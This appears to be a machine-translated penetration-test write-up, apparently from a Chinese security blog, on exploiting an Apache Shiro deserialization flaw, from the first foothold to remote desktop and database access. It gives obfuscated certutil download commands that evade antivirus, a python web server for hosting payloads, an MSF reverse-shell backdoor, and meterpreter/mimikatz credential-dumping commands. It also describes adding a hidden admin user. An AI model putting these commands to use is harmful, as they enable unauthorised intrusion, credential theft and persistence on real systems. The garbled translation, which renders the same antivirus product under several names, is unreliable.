Title: Record Shiro deserialization to remote desktop

First, search on Qi'anxin hunter to find the relevant assets of the SRC (I won't leave it out for details), and then search the subdomain name to find today's test site through micro-steps.

Then, using xray to detect that there is a Shiro deserialization vulnerability in the site

So I considered using feihong's anti-serialization tool directly, but this time feihong's deserialization tool only detected the key, but gatget did not. After consulting my colleague Chen Ge, I considered that it was because the tool had not been updated for a long time, so I needed to find a CB chain and press it back to the car with a snap.

directly starts and check whether there is antivirus software in the system. It is clear at a glance that there is Turvle antivirus software in the system.

After confirming that the target system exists in Turf, I tried to go online immediately. Related article content: Remember the practical case of bypassing Turf's security and power promotion

But unfortunately, after trying this method many times locally, I found that Turfur has intercepted and detected this method.

The subsequent communication with the 3h master should have been to check the characteristics of the file, but there was no way to explore the bypass in a deeper manner.

Off topic: There is a small pit when testing here. It feels like it is a problem with the tool. The tool will get stuck when executing a large number of echoed data packets. You need to restart the tool and execute the command again.

Here, we chose the remote download method of certutil bypassing Huorong. The regular download of cerutil is definitely not possible, so we thought of the transformed version of cerutil bypass method posted by the master in the group before. After local testing, it was found that Turfur did not intercept the command. At this time, the excited little hand was already anxious.

'c''e''r''t''u''t''i'l' -'u''r''l' -'u''r''l''c''a''c''h''e' -split -f https://url/1.exe 1.exe off topic: I found that the target system did not parse my vps IP, which made me look for people everywhere for VPS in the early morning of the evening. I felt that I had to prepare a domestic vps and a foreign vps at any time.

After finding vps, I ping the IP address of vps on the tool

You can parse it to the IP and enjoy it, but it is better to check the target server's recent login time before downloading it to avoid being discovered

directly starts, first start a temporary python web on vps, the command is as follows.

python -m SimpleHTTPServer 8888 Then test it locally to see if you can download it. OK, no problem!

Now it is directly executed on the target system in the tool and successfully landed under the current path.

Execute the dir command to see if it is successfully downloaded to the current directory

Go online after running the file

View system version

Because it is a higher version, you cannot obtain plain text information

So there are two ways to connect remotely, one is to upload remote control software, and the other is to directly add users.

Let's see the first one first, use the screenshot command to see if it is in the lock screen state

From this we can judge that the current machine should be in the lock screen, so we can only add one user to it here. Because there is turquoise in the machine, bypass turquoise is also needed to add the user to the user. I will not release the method for the time being (please forgive me, masters)

After the user joins, he can connect to the remote desktop

Now you can connect

Then after coming in, I flipped into a configuration file with the database information

Mysql connection

Summary

1. The target system has a shiro deserialization vulnerability through xray passive scanning 2. First use feihong's deserialization tool, but this time feihong's deserialization tool only detects keys, gatget does not detect 3. The target system shell can be successfully bounced out through shiro_attack-4.5-SNAPSHOT-all (using commonsBeanutils chain here) 4. First execute the command taslist/svc, and through the Windows privilege enhancement auxiliary tool (https://github.com/Ruiruigo/WinEXP or https://i.hacking8.com/tiquan). Query the usysdiag.exe process is Turf 5. Bypass Turf through the deformed version of certutil to download the file, and you can download the backdoor file to the target system. 'c''e''r''t''u''t''i''l' -'u''r''l''c''a''c''h''e' -split -f https://url/1.exe 1.exe6. Generate the backdoor file 123.exe of the rebound shell through MSF on your VPS (the 123.exe generated here needs to be free of kill) 7. Build the http service on your VPS and place 123.exe under the SimpleHTTPServer service running. python -m SimpleHTTPServer 88888. Download the backdoor through the command execution function of shiro_attack-4.5-SNAPSHOT-all, and execute 123.exe'c''e''r''t''u''t''i'l' -'u''r''l''c''a''c''h''e' -split -f https://url/123.exe 123.exe9. After running the file, it is successfully launched. Check the system version and patch and mimkatz to output plaintext. Because it is a higher version, it cannot obtain plaintext information meterpretergetuid //Show adminsitro permission meterpretersysteminfo //Show system patch meterpreterload_kiwi //Load mimikatz meterpretergetsystem //Perform meterpretercreds_wdigest //Get hash value meterpetershell netstat-ano-p tcp | find '3389' //Show port 3389 is open 10. Bypass turtle and add the user to the administrator group 12. Log in remote desktop through mstsc, and find the user name and password of the database configuration file of the target website in the system. Here you can upload a sentence of Glass, and then connect data through Glass' own database management module.

Original link: https://mp.weixin.qq.com/s?__biz=Mzg4NTUwMzM1Ng==mid=2247494220idx=1sn=5009f9378aed90335f0bfe5e97f12a84chksm=cfa54e5ff8d2c74969789d47eff9b9755fbd08b4d80e7a4dbc7f35534852c317bfd5d6fae0cdscene=178cur_album_id=1553386251775492098#rd